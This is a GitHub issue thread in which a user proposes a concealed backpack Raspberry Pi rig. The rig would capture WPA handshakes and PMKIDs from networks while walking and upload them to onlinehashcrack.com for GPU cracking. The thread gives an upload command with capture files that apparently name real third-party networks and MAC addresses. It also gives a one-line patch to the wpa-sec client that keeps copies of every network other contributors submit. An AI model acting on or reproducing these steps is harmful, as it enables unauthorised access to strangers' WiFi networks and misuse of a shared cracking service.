search

eliddell1 / FistBump

ProtoType for a handheld device used to grab WPA four way handshakes
MIT License
37 stars 4 forks source link

Wifite 2? #2

Open ProjectZeroDays opened 4 years ago

ProjectZeroDays commented 4 years ago

Is there a way we can revamp a small arm device that uses a 4g Broadcom card and a separate internal adapter and run a light version of nethunter on it to make this work? There cactus 2 made a storm when they created a back pack with 22 pinnacle nanos to scan every channel independently with 42 antennas rear mounted in a special back pack.

https://youtu.be/3II3K44rQx4

I think you could run a light stripper down version or Kali for arm devices now using the new repository setup with just tools we need (tshark, pyrit, John, hashcrack, aircrack-ng suite, cowpatty, reaver, etc) and it’s dependencies using the built in hooks and build the exact metapackages needed to run it and have a light weight low power consumption device that could capture pmkid, and handshakes and use the built in api for onlinehashcrack.com (wlancap2wpasec -u https://api.onlinehashcrack.com -e projectzerodays@gmail.com handshake_ATT2V4y9Wg_14-ED-BB-CD-22-41_2019-12-30T17-49-26.cap handshake_MySpectrumWiFi362G_58-90-43-DD-A2-3C_2019-11-26T10-17-35.cap handshake_RobertsWiFiNetwork_7C-D1-C3-CA-6C-94_2019-12-30T16-20-18.cap )

...using the Broadcom 3f/4g services to upload them to the cloud free where it can crack them using AWS servers using Highpowered NVDIA GPU processors to run the cracks against them. The only issue would be that wifite would need to reconfigured in python3 to allow hashcat handle the dump. If hcxdumptool does not handle the process itself it pollutes the handshake and will lead to a 99% failure rate. Now that I’m thinking of it, I can probably write this in a few days and make a distro avail online for pi users and we can run that on a 20k mil amp battery pack and carry it in a small backpack with 4 9db antennas to catch 2 and 5g and all you would have to do is use realVNC to remotely access the device in your back pack while walking using a cheap android tablet while walking using the untouched 4g while management the mostly automated wifite transactions while in monitor mode. If anyone is interested please let me know. The WHID pro elite uses a 3g/4g sim and create a wireless AP on airgapped systems and more to run cracks similar to this including remotely inject keystrokes, bypass air-gapped systems, conduct mousejacking attacks, do acoustic surveillance, RF replay attacks and much more.

https://github.com/whid-injector/whid-31337

https://github.com/eliddell1/FistBump/issues/new

ProjectZeroDays commented 4 years ago

Someone has done something similar but no 4g. https://gist.github.com/avin/9880dbd3b1dd6f718a298740fe26c134

ProjectZeroDays commented 4 years ago

You may also want to read this thread: https://hashcat.net/forum/post-39288.html

ProjectZeroDays commented 4 years ago

1) wpa-sec moved to hashcat >= 4.0.1 and hcxtools >= 4.0.1 The python client (help_crack.py) is updated to version (0.9.0 / 10 Feb 2018) BTW: you can help retrieving new PSKs, contributing GPU power (simple run the python client) if you add the following line to help_crack.py (line 405): os.system('cat help_crack.net >> wpasec_new.hccapx') you will get a local copy of every network hashcat is working on.

2) somebody made a video of "Automated Wifi Attacks With HCXTOOLS" https://www.youtube.com/watch?v=3-IhrlBpoQg

If we use this with the right supported WiFi/4g cards for pi, added a battery pack and antennas, you would be on the money:

So using that method, the pi, one of the following WiFi cards:

Right now this code supports this drivers in combination with a kernel >= 4.9: USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter USB ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n PCIe RTL8821AE 802.11ac PCIe Wireless Network Adapter

And the following 4G card: S4 LTE-A (GT-I9506)

Then install hcxtools and download the python client:

help_crack.py ( )

Open it in Gedit and add the following line to help_crack.py (line 405): os.system('cat help_crack.net >> wpasec_new.hccapx') you will get a local copy of every network hashcat is working on and prevent the files from being polluted when hcxtools handles and dumps it.

Someone made a video of "Automated Wifi Attacks With HCXTOOLS"

https://www.youtube.com/watch?v=3-IhrlBpoQg

Wifite could be modified into a new various to support the option to let hcxtools handle the card during the needed operations and then hand it over back to wifite to run the remaining scans as well use hcxtools’ built in API to upload the files straight to onlinehashcrack.com using:

(wlancap2wpasec -u https://api.onlinehashcrack.com -e projectzerodays@gmail.com handshake_ATT2V4y9Wg_14-ED-BB-CD-22-41_2019-12-30T17-49-26.cap handshake_MySpectrumWiFi362G_58-90-43-DD-A2-3C_2019-11-26T10-17-35.cap handshake_RobertsWiFiNetwork_7C-D1-C3-CA-6C-94_2019-12-30T16-20-18.cap )

The mobile version of wifite can be found here and further modified very quickly:

https://gist.github.com/avin/9880dbd3b1dd6f718a298740fe26c134

To offload the hashing using a free service with 20 million plus password combos using GPU driven cloud severs.